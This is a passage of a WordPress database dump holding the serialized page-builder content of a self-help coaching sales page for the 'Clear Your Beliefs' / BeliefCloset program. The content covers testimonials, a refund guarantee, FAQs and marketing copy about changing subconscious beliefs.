style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\n<div style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We’ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\n// ]]></script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:2:"20";s:4:"cell";s:1:"0";s:2:"id";s:2:"26";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:21:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"3";}i:2;a:1:{s:5:"cells";s:1:"1";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"2";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"3";}i:7;a:1:{s:5:"cells";s:1:"1";}i:8;a:1:{s:5:"cells";s:1:"1";}i:9;a:1:{s:5:"cells";s:1:"1";}i:10;a:1:{s:5:"cells";s:1:"1";}i:11;a:1:{s:5:"cells";s:1:"2";}i:12;a:1:{s:5:"cells";s:1:"1";}i:13;a:1:{s:5:"cells";s:1:"1";}i:14;a:1:{s:5:"cells";s:1:"1";}i:15;a:1:{s:5:"cells";s:1:"1";}i:16;a:1:{s:5:"cells";s:1:"1";}i:17;a:1:{s:5:"cells";s:1:"1";}i:18;a:1:{s:5:"cells";s:1:"1";}i:19;a:1:{s:5:"cells";s:1:"1";}i:20;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:27:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.5984943538268507";s:4:"grid";s:1:"1";}i:3;a:2:{s:6:"weight";s:19:"0.20075282308657466";s:4:"grid";s:1:"1";}i:4;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:18:"0.8996235884567128";s:4:"grid";s:1:"6";}i:11;a:2:{s:6:"weight";s:19:"0.05018820577164367";s:4:"grid";s:1:"6";}i:12;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}i:13;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"8";}i:14;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"9";}i:15;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"10";}i:16;a:2:{s:6:"weight";s:18:"0.6996291718170581";s:4:"grid";s:2:"11";}i:17;a:2:{s:6:"weight";s:18:"0.3003708281829419";s:4:"grid";s:2:"11";}i:18;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"12";}i:19;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"13";}i:20;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"14";}i:21;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"15";}i:22;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"16";}i:23;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"17";}i:24;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"18";}i:25;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"19";}i:26;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:2:"20";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1625, 2054, 'panels_data', 'a:3:{s:7:"widgets";a:26:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:137:"<div class="top-img"> <img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg"> </div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:650:"<div class="quot custo-quot" style="margin-top: 0px; text-align: center;">\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong></span>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:5:"title";s:0:"";s:4:"text";s:95:"<div class="parg-title"><h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:14:"WP_Widget_Text";}}i:3;a:4:{s:5:"title";s:0:"";s:4:"text";s:483:"<div class="parg-text"><p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"3";s:5:"class";s:14:"WP_Widget_Text";}}i:4;a:4:{s:5:"title";s:0:"";s:4:"text";s:183:"<div class="parg-img"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"1";s:2:"id";s:1:"4";s:5:"class";s:14:"WP_Widget_Text";}}i:5;a:4:{s:5:"title";s:0:"";s:4:"text";s:132:"<div class="parg-title"><h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:529:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>\n\n<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"13";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:14;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"14";s:5:"class";s:14:"WP_Widget_Text";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:62973:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It’s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get 